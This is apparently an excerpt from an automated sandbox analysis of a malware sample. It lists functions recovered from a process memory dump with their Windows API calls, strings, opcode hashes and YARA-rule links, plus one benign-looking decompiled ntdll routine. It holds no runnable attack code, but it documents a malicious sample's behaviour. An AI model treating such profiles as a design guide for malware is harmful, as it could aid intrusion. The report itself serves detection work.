                                                                                                        • Opcode ID: 391cf7325f05b3a576dca56acac0b06b412e4921afc875eac07b5dad9ad702a5
                                                                                                        • Instruction ID: 6f90e9db6e3cfcc919e139beab3bae254cf869137cac19b5d34d41d71b5a9dd9
                                                                                                        • Opcode Fuzzy Hash: 391cf7325f05b3a576dca56acac0b06b412e4921afc875eac07b5dad9ad702a5
                                                                                                        • Instruction Fuzzy Hash: 31113A3664021D7BEB21A694AC56FBE7B6CBF84720F04805DFE08EB181E660990187E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00576EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 00576F98
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                        • Opcode ID: b50f98344ab47ed974b2589213e9cd93943e64bbfbf8dcd2169a33c92deb350a
                                                                                                        • Instruction ID: 88ac181cc3d889c19c99cc507aa4f70123619440991280c541d9793afb61a949
                                                                                                        • Opcode Fuzzy Hash: b50f98344ab47ed974b2589213e9cd93943e64bbfbf8dcd2169a33c92deb350a
                                                                                                        • Instruction Fuzzy Hash: F731AFB5601705ABC725DF68E8A5FA7BBF8BB88700F00841DF61E9B241D730B945DBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00576EE6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 00576F98
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                        • Opcode ID: cec6b4a9770c255474567c8e62e4a785ee356e96482be4c032d7036ef622da21
                                                                                                        • Instruction ID: d3bce8912b5d263d39141a6e9051ad9046da28dff23f1fb64b59a3b90ac59838
                                                                                                        • Opcode Fuzzy Hash: cec6b4a9770c255474567c8e62e4a785ee356e96482be4c032d7036ef622da21
                                                                                                        • Instruction Fuzzy Hash: 8221D0B1601705AFD711DFA4E8A5FABBBB8BB88700F14C01DF61D9B241D370A841DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005784DB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00563B93), ref: 0057850D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID: .z`
                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                        • Opcode ID: 31a21d1c646dedd6b5dd620dd8a828e6e33f483d4d760c0eac4ded93dbe8e70f
                                                                                                        • Instruction ID: 523d0c921ad1a430e44df8b707bc8fd65220835a7f44ba73e7392c6881361601
                                                                                                        • Opcode Fuzzy Hash: 31a21d1c646dedd6b5dd620dd8a828e6e33f483d4d760c0eac4ded93dbe8e70f
                                                                                                        • Instruction Fuzzy Hash: F6E092B1244214AFDB24DF64CC89EE73B68EF84350F014158FD0C97241C631E910CBB0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005784E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00563B93), ref: 0057850D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID: .z`
                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                        • Instruction ID: 97ed623ecc398109955b0a2b6b388df5e6599d41d8f5dc1c0f6580038ae47a4e
                                                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                        • Instruction Fuzzy Hash: E3E04FB12002186BD714DF59DC49EA777ACEF88750F018555FD0C57241C630F910CAF0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005784A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(&5W,?,00573C9F,00573C9F,?,00573526,?,?,?,?,?,00000000,00000000,?), ref: 005784CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID: &5W
                                                                                                        • API String ID: 1279760036-2495604129
                                                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                        • Instruction ID: 6536d50349683df4172293a110fb644b4b8dc1960cc81d325c67f0943aeeadd3
                                                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                        • Instruction Fuzzy Hash: 4AE012B1200218ABDB24EF99DC45EA777ACAF88750F118559BA085B282CA30F9108AB0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00567270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 005672CA
                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 005672EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836367815-0
                                                                                                        • Opcode ID: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
                                                                                                        • Instruction ID: ae3429596dc7785c729c6132c3cc185fc86a126d7362907d0af2a8675cefc571
                                                                                                        • Opcode Fuzzy Hash: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
                                                                                                        • Instruction Fuzzy Hash: 9501D631A8022977E720A6949C07FFE7B6C6F84F51F154118FF08BB1C1E6A46A0687F6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00569B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00569BA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                        • Instruction ID: b8d06a93a752d458b9a6538730d0d6476dc71d8a0f41e74cb941d2aff0290cfe
                                                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                        • Instruction Fuzzy Hash: E90152B5D0010EA7DB10DAA0EC46F9DB778AB94308F008195E90C97141F671EB04D791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00578550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 005785A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2186235152-0
                                                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                        • Instruction ID: c3ae778e53b2d24c0373b4aa13d9e48e927da1c86e5cce37fc5ed784232c8d67
                                                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                        • Instruction Fuzzy Hash: 4501AFB2210108ABCB54DF89DC84EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0057854E, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 005785A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2186235152-0
                                                                                                        • Opcode ID: b3e24d8a51614727c492a60febede8ed14c17e0d461b3327f547a3a59814f506
                                                                                                        • Instruction ID: 9f369064c6ed6791fc7341cefc0e9f50e87b609f271179bd85fa4ddc0b8152a0
                                                                                                        • Opcode Fuzzy Hash: b3e24d8a51614727c492a60febede8ed14c17e0d461b3327f547a3a59814f506
                                                                                                        • Instruction Fuzzy Hash: 2401B2B2210108BFCB54CF89DD84EEB37ADAF8C354F158248FA0DA7244C630E851CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00577020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0056CCE0,?,?), ref: 0057705C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 1ec0bcf43cfeada3cf0df82c07475058d1b9cdf7a96d147d1bccb919d94a702f
                                                                                                        • Instruction ID: d943605cae6cd06592e22aabd47cfc9d60706098da57546265c0b4d66d331709
                                                                                                        • Opcode Fuzzy Hash: 1ec0bcf43cfeada3cf0df82c07475058d1b9cdf7a96d147d1bccb919d94a702f
                                                                                                        • Instruction Fuzzy Hash: D8E06D333802043AE3306599AC02FA7B79C9B85B30F544026FA0DEA2C1D595F90152A9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00578631, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0056CFB2,0056CFB2,?,00000000,?,?), ref: 00578670
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3899507212-0
                                                                                                        • Opcode ID: 88698f734cb233a107b751ff6b9a96b59ffeb2ecd4caa4cedf307e1ea97ce25a
                                                                                                        • Instruction ID: 484bfab5e67907a8f06b51a40cf60eb1b147a9d49685577792e849d6364678db
                                                                                                        • Opcode Fuzzy Hash: 88698f734cb233a107b751ff6b9a96b59ffeb2ecd4caa4cedf307e1ea97ce25a
                                                                                                        • Instruction Fuzzy Hash: 46E02BB26445402BEB10EF64DC84DE77FD8DF46220F148A59F8CD4B102C830A50ACB70
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00578640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0056CFB2,0056CFB2,?,00000000,?,?), ref: 00578670
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3899507212-0
                                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                        • Instruction ID: dc1c0cafb266013979f7e775de521ab32b128a0581b19f274a09776c1b85bd20
                                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                        • Instruction Fuzzy Hash: B8E01AB12002186BDB20DF49DC85EE737ADAF88750F018155BA0C57241C930E8108BF5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0056D417, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00567C73,?), ref: 0056D44B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 3b2ab48f0e5dd878073063bfbe9dbaa0ddfcd03232b76175f840a2bb058aadc3
                                                                                                        • Instruction ID: 93023aa66e76f7a639d385f103e074dc098364abf11908d13aa1a725ac6d5856
                                                                                                        • Opcode Fuzzy Hash: 3b2ab48f0e5dd878073063bfbe9dbaa0ddfcd03232b76175f840a2bb058aadc3
                                                                                                        • Instruction Fuzzy Hash: 60E0C275B802027BEB00EF54DC06F6A7794BB84710F0980A4FC08AB7C3DB34F4018622
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0056D451, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00567C73,?), ref: 0056D44B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 0bc9fb4654aee714c9dece775ba520c77a4fdd7b04df6526ed945626c06e73d9
                                                                                                        • Instruction ID: da87a413a0337241fc6ca4dcbb05170449ad5eb13337270a9bf3f1bdb0e8e219
                                                                                                        • Opcode Fuzzy Hash: 0bc9fb4654aee714c9dece775ba520c77a4fdd7b04df6526ed945626c06e73d9
                                                                                                        • Instruction Fuzzy Hash: F8D01295B9430535F92079F47C03F6756491790B55F158921BA0CE65C3FD94D9166032
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0056D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00567C73,?), ref: 0056D44B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                        • Instruction ID: 97667a02613aff0e6310564f6432e6eae6da04a84dedf890a778ae136743e689
                                                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                        • Instruction Fuzzy Hash: AAD05E617503042AEB10BAA49C07F26768CAB84B10F494064F948972C3E964E9004162
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F3967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 998e6e40fbb3b1c5cb7f45677fc93c873409a7bf40314cfb82a3cc927e148193
                                                                                                        • Instruction ID: 5deb1098dfd160d4d109fcbf74377e69243f46354c099c16e586b5ab37cc4c5b
                                                                                                        • Opcode Fuzzy Hash: 998e6e40fbb3b1c5cb7f45677fc93c873409a7bf40314cfb82a3cc927e148193
                                                                                                        • Instruction Fuzzy Hash: F6B09B71D064C5C5D611D76046087177D0477D0781F16C051D3020681A47F8C191F5B5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 02F8FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 53%
                                                                                                        			E02F8FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02F3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02F85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02F85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                        0x02f8fdda
                                                                                                        0x02f8fde2
                                                                                                        0x02f8fde5
                                                                                                        0x02f8fdec
                                                                                                        0x02f8fdfa
                                                                                                        0x02f8fdff
                                                                                                        0x02f8fe0a
                                                                                                        0x02f8fe0f
                                                                                                        0x02f8fe17
                                                                                                        0x02f8fe1e
                                                                                                        0x02f8fe19
                                                                                                        0x02f8fe19
                                                                                                        0x02f8fe19
                                                                                                        0x02f8fe20
                                                                                                        0x02f8fe21
                                                                                                        0x02f8fe22
                                                                                                        0x02f8fe25
                                                                                                        0x02f8fe40

                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F8FDFA
                                                                                                        Strings
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F8FE01
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F8FE2B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                        • API String ID: 885266447-3903918235
                                                                                                        • Opcode ID: 40e4223b9c47a7c316c7bed7e1ad4e9924f9db47170d02cc0340dbd41c79107f
                                                                                                        • Instruction ID: 0043a9a7e59ab5670ecfd3538116ad8d7befaf8370973c73205067d7dc5a21c1
                                                                                                        • Opcode Fuzzy Hash: 40e4223b9c47a7c316c7bed7e1ad4e9924f9db47170d02cc0340dbd41c79107f
                                                                                                        • Instruction Fuzzy Hash: 59F0F633640205BFEA202A55DC02F23BB5BEB44770F154315F729565D1DA62F86086F0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%